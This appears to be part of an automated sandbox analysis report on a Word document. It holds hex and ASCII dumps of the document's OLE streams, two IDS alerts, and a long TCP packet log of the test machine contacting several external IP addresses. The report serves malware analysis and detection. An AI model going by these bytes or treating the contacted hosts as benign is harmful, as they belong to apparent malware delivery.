                                                                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . H . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                                    Data Raw:01 98 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 48 a0 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                    Stream Path: WordDocument, File Type: data, Stream Size: 118910
                                                                    General
                                                                    Stream Path:WordDocument
                                                                    File Type:data
                                                                    Stream Size:118910
                                                                    Entropy:7.18905041003
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . E r . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . E j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 45 72 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e d0 01 00 62 7f 00 00 62 7f 00 00 45 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                                    Stream Path: word, File Type: data, Stream Size: 2685
                                                                    General
                                                                    Stream Path:word
                                                                    File Type:data
                                                                    Stream Size:2685
                                                                    Entropy:7.92981016152
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . & r . . } . ^ n . % . N = . n t . . . . . T . . K . - . . . . , g . . t v . . . . ' . . e B . ; E s . . . - } . i n . z . B . . ) . . L . . . . . . . . . . < . N . . X . V B : s . . . . m l . . . _ . Z h . K u . . . c . . . 1 . , . l I H . . . . > . . . P . / W . . . . . . . . m W . . . ! . D @ . - < I . . . . . \\ ~ . . X 3 I . . . . F . . e u f , . . . . . . . . . . . . . . V . . d . . . . . . W A ; . . K . . & . . . _ . ^ . . . 1 . ( 5 . . . . . . . . - 2 } . u . U . . . D . m . ) . . . . # M z r
                                                                    Data Raw:f5 d4 81 26 72 10 0b 7d cc 5e 6e 9d 25 f3 4e 3d cd 6e 74 8c a5 0b a7 04 54 09 a2 4b 02 2d 1b cc 8d fc 2c 67 f0 af 74 76 bc e8 0b dd 27 a2 89 65 42 b4 3b 45 73 c5 a6 ea 2d 7d d1 69 6e c0 7a 9f 42 a2 10 29 c6 e7 4c 1d f9 fe d0 bd ff c9 dc b2 7f 3c 09 4e f2 d6 58 c7 56 42 3a 73 de 0b 08 fb 6d 6c 9a 85 92 5f 9f 5a 68 1d 4b 75 f4 e8 ea 63 a0 1e e9 31 b7 2c ad 6c 49 48 d3 84 ad d9 3e ee

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    01/24/21-18:04:47.949908ICMP399ICMP Destination Unreachable Host Unreachable69.38.130.14192.168.2.22
                                                                    01/24/21-18:04:51.799916ICMP399ICMP Destination Unreachable Host Unreachable69.38.130.14192.168.2.22

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 24, 2021 18:03:27.558248043 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:03:27.573486090 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.573607922 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:03:27.576509953 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:03:27.591650009 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612721920 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612776041 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612808943 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612844944 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612879992 CET8049165104.21.89.78192.168.2.22
                                                                    Jan 24, 2021 18:03:27.613009930 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:03:27.613063097 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:03:27.680191994 CET4916680192.168.2.22166.62.10.32
                                                                    Jan 24, 2021 18:03:27.817333937 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:03:27.908014059 CET8049166166.62.10.32192.168.2.22
                                                                    Jan 24, 2021 18:03:27.908535957 CET4916680192.168.2.22166.62.10.32
                                                                    Jan 24, 2021 18:03:27.908679008 CET4916680192.168.2.22166.62.10.32
                                                                    Jan 24, 2021 18:03:28.132867098 CET8049166166.62.10.32192.168.2.22
                                                                    Jan 24, 2021 18:03:28.149194002 CET8049166166.62.10.32192.168.2.22
                                                                    Jan 24, 2021 18:03:28.341419935 CET49167443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.363403082 CET4916680192.168.2.22166.62.10.32
                                                                    Jan 24, 2021 18:03:28.474503040 CET44349167162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.474772930 CET49167443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.491565943 CET49167443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.624684095 CET44349167162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.625586033 CET44349167162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.625660896 CET44349167162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.625957012 CET49167443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.637599945 CET49167443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.638797998 CET49168443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.770633936 CET44349167162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.783262014 CET44349168162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.783468008 CET49168443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.784141064 CET49168443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.928432941 CET44349168162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.929406881 CET44349168162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.929439068 CET44349168162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:28.929625988 CET49168443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:28.933468103 CET49168443192.168.2.22162.241.60.240
                                                                    Jan 24, 2021 18:03:29.077756882 CET44349168162.241.60.240192.168.2.22
                                                                    Jan 24, 2021 18:03:29.247159004 CET49169443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.391366959 CET44349169162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.391542912 CET49169443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.392230034 CET49169443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.537026882 CET44349169162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.537552118 CET44349169162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.537595034 CET44349169162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.537748098 CET49169443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.541102886 CET49169443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.542129040 CET49170443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.675307989 CET44349170162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.675443888 CET49170443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.676029921 CET49170443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.684993982 CET44349169162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.815021038 CET44349170162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.829583883 CET44349170162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.829624891 CET44349170162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.829824924 CET49170443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.833112001 CET49170443192.168.2.22162.241.224.176
                                                                    Jan 24, 2021 18:03:29.926774025 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:29.966149092 CET44349170162.241.224.176192.168.2.22
                                                                    Jan 24, 2021 18:03:29.975322962 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:29.975429058 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:29.975642920 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.023983955 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521126032 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521193027 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521224022 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521255970 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521296978 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521338940 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521404982 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521460056 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521497965 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521516085 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.521548986 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521550894 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.521573067 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570323944 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570390940 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570421934 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570461035 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570499897 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570538998 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570579052 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570619106 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570635080 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570666075 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570667982 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570672035 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570713043 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570750952 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570779085 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570790052 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570828915 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570852995 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570871115 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570900917 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.570914030 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570952892 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570972919 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.571000099 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.571043015 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.571059942 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.571120977 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.571181059 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.621032000 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621093035 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621130943 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621166945 CET804917145.143.97.183192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621257067 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.621309042 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:30.811114073 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:30.944581032 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:30.944771051 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:30.944920063 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.078263998 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210002899 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210056067 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210103035 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210114002 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210149050 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210186958 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210206985 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210225105 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210263968 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210273027 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210302114 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210341930 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210357904 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210386038 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210439920 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343626976 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343686104 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343724966 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343772888 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343774080 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343815088 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343837023 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343856096 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343895912 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343915939 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343935013 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343972921 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344002962 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344017982 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344057083 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344091892 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344106913 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344149113 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344175100 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344187021 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344228029 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344253063 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344266891 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344304085 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344327927 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344343901 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344383955 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344410896 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344433069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344502926 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344650984 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.345360041 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.477859974 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.477921009 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.477952957 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.477986097 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478027105 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478068113 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478107929 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478149891 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478188992 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478238106 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478264093 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478281975 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478295088 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478301048 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478322029 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478353024 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478377104 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478418112 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478442907 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478456020 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478491068 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478496075 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478545904 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478571892 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478584051 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478624105 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478642941 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478663921 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478712082 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478728056 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478755951 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478794098 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478817940 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478836060 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478873968 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478895903 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478913069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478952885 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478976011 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478992939 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479041100 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479057074 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479084015 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479124069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479146957 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479162931 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479202986 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479222059 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479242086 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479281902 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479300976 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479321003 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479368925 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479387999 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479415894 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479454994 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479479074 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479495049 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479556084 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.480122089 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.612816095 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612875938 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612907887 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612938881 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612970114 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613012075 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613051891 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613090038 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613130093 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613179922 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613212109 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613224030 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613241911 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613248110 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613265991 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613281965 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613307953 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613351107 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613375902 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613426924 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613471031 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613471985 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613511086 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613542080 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613553047 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613603115 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613619089 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613647938 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613687992 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613715887 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613728046 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613768101 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613791943 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613794088 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613835096 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613853931 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613873959 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613923073 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613939047 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613967896 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614006996 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614028931 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614047050 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614088058 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614118099 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614125967 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614166021 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614190102 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614204884 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614254951 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614267111 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614300013 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614340067 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614362001 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614379883 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614423990 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614443064 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614463091 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614505053 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614525080 CET4917280192.168.2.22162.241.61.203
